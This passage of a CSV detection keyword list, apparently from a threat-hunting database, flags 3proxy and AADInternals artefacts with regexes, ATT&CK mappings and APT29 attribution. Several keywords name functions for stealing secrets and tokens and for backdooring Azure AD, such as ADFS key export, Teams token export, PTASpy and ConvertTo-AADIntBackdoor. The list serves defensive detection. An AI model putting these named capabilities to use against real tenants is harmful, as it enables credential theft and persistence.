plugin*",".{0,1000}3proxy\sWindows\sAuthentication\splugin.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*3proxy.exe --*",".{0,1000}3proxy\.exe\s\-\-.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - 
TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*3proxy.service*",".{0,1000}3proxy\.service.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","#servicename","linux servicename","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*3proxy/3proxy*",".{0,1000}3proxy\/3proxy.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","1","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*3proxy@3proxy.org*",".{0,1000}3proxy\@3proxy\.org.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","#email","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "*add3proxyuser.sh*",".{0,1000}add3proxyuser\.sh.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/3proxy/3proxy","1","0","N/A","N/A","8","10","3808","754","2024-07-18T09:51:05Z","2014-04-08T08:59:11Z" "* -ServiceName ""AADInternals""*",".{0,1000}\s\-ServiceName\s\""AADInternals\"".{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/Gerenios/AADInternals","1","0","#servicename","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*/AADInternals.git*",".{0,1000}\/AADInternals\.git.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*\AADInternals\*",".{0,1000}\\AADInternals\\.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*\CloudShell.ps1*",".{0,1000}\\CloudShell\.ps1.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*\CloudShell_utils.ps1*",".{0,1000}\\CloudShell_utils\.ps1.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - 
TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*\DCaaS_utils.ps1",".{0,1000}\\DCaaS_utils\.ps1","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*\InjectDLL.exe*",".{0,1000}\\InjectDLL\.exe.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*\PTASpy.dll*",".{0,1000}\\PTASpy\.dll.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*\PTASpy.ps1*",".{0,1000}\\PTASpy\.ps1.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - 
TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*A little service to steal the AD FS DKM secret :)*",".{0,1000}A\slittle\sservice\sto\ssteal\sthe\sAD\sFS\sDKM\ssecret\s\:\).{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*AADConnectProvisioningAgentWizard.exe*",".{0,1000}AADConnectProvisioningAgentWizard\.exe.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*AADInternals.exe*",".{0,1000}AADInternals\.exe.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*AADInternals.pdb*",".{0,1000}AADInternals\.pdb.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - 
T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*AADInternals.psd1*",".{0,1000}AADInternals\.psd1.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*AADInternals.psm1*",".{0,1000}AADInternals\.psm1.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Add-AADIntAccessTokenToCache*",".{0,1000}Add\-AADIntAccessTokenToCache.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Add-AADIntEASDevice*",".{0,1000}Add\-AADIntEASDevice.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for 
administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Add-AADIntRolloutPolicyGroups*",".{0,1000}Add\-AADIntRolloutPolicyGroups.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Add-AADIntSPOSiteFiles*",".{0,1000}Add\-AADIntSPOSiteFiles.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Add-AADIntSyncFabricServicePrincipal*",".{0,1000}Add\-AADIntSyncFabricServicePrincipal.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*AzureADConnectAuthenticationAgentService.exe*",".{0,1000}AzureADConnectAuthenticationAgentService\.exe.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*ConvertTo-AADIntBackdoor*",".{0,1000}ConvertTo\-AADIntBackdoor.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Disable-AADIntTenantMsolAccess*",".{0,1000}Disable\-AADIntTenantMsolAccess.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*DSInternals\DSInternals.Replication.dll*",".{0,1000}DSInternals\\DSInternals\.Replication\.dll.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - 
TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*DSInternals\DSInternals.Replication.Interop.dll*",".{0,1000}DSInternals\\DSInternals\.Replication\.Interop\.dll.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*DSInternals\DSInternals.Replication.Model.dll*",".{0,1000}DSInternals\\DSInternals\.Replication\.Model\.dll.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*DSInternals\msvcp140.dll*",".{0,1000}DSInternals\\msvcp140\.dll.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*DSInternals\NDceRpc.Microsoft.dll*",".{0,1000}DSInternals\\NDceRpc\.Microsoft\.dll.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module 
for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*DSInternals\vcruntime140.dll*",".{0,1000}DSInternals\\vcruntime140\.dll.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*DSInternals\vcruntime140_1.dll*",".{0,1000}DSInternals\\vcruntime140_1\.dll.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Enable-AADIntTenantMsolAccess*",".{0,1000}Enable\-AADIntTenantMsolAccess.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Export-AADIntADFSCertificates*",".{0,1000}Export\-AADIntADFSCertificates.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Export-AADIntADFSConfiguration*",".{0,1000}Export\-AADIntADFSConfiguration.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Export-AADIntADFSEncryptionKey*",".{0,1000}Export\-AADIntADFSEncryptionKey.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Export-AADIntAzureCliTokens*",".{0,1000}Export\-AADIntAzureCliTokens.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation 
tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Export-AADIntLocalDeviceCertificate*",".{0,1000}Export\-AADIntLocalDeviceCertificate.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Export-AADIntLocalDeviceTransportKey*",".{0,1000}Export\-AADIntLocalDeviceTransportKey.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Export-AADIntProxyAgentBootstraps*",".{0,1000}Export\-AADIntProxyAgentBootstraps.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Export-AADIntProxyAgentCertificates*",".{0,1000}Export\-AADIntProxyAgentCertificates.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - 
T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Export-AADIntProxyAgentCertificates.*",".{0,1000}Export\-AADIntProxyAgentCertificates\..{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Export-AADIntSPOSiteFile*",".{0,1000}Export\-AADIntSPOSiteFile.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Export-AADIntTeamsTokens*",".{0,1000}Export\-AADIntTeamsTokens.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Export-AADIntTokenBrokerTokens*",".{0,1000}Export\-AADIntTokenBrokerTokens.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Export-ADFSEncryptionKeyUsingService*",".{0,1000}Export\-ADFSEncryptionKeyUsingService.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Gerenios/AADInternals*",".{0,1000}Gerenios\/AADInternals.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAADConnectStatus*",".{0,1000}Get\-AADIntAADConnectStatus.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation 
tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessAccessPackages*",".{0,1000}Get\-AADIntAccessAccessPackages.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessPackageAdmins*",".{0,1000}Get\-AADIntAccessPackageAdmins.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessPackageCatalogs*",".{0,1000}Get\-AADIntAccessPackageCatalogs.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation 